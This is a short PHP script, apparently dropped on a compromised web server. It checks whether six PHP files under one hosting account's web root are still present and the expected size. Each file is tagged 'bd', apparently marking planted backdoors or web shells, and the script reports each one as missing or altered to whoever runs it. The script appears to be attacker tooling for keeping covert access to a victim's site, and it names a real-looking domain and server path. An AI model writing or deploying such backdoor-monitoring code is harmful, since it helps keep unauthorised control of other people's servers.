<?php   $r = ''; $x = ["/home/xrnkcymh/pgpportal.scitcon.com.ng/short.php"=>"bd@@310636070@@972",
"/home/xrnkcymh/pgpportal.scitcon.com.ng/user.php"=>"bd@@310636103@@580",
"/home/xrnkcymh/pgpportal.scitcon.com.ng/comp.php"=>"bd@@282556235@@1137",
"/home/xrnkcymh/pgpportal.scitcon.com.ng/forms.php"=>"bd@@310640273@@795",
"/home/xrnkcymh/pgpportal.scitcon.com.ng/fput.php"=>"bd@@282556334@@831",
"/home/xrnkcymh/pgpportal.scitcon.com.ng/71.php"=>"bd@@282556136@@1196"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!'); 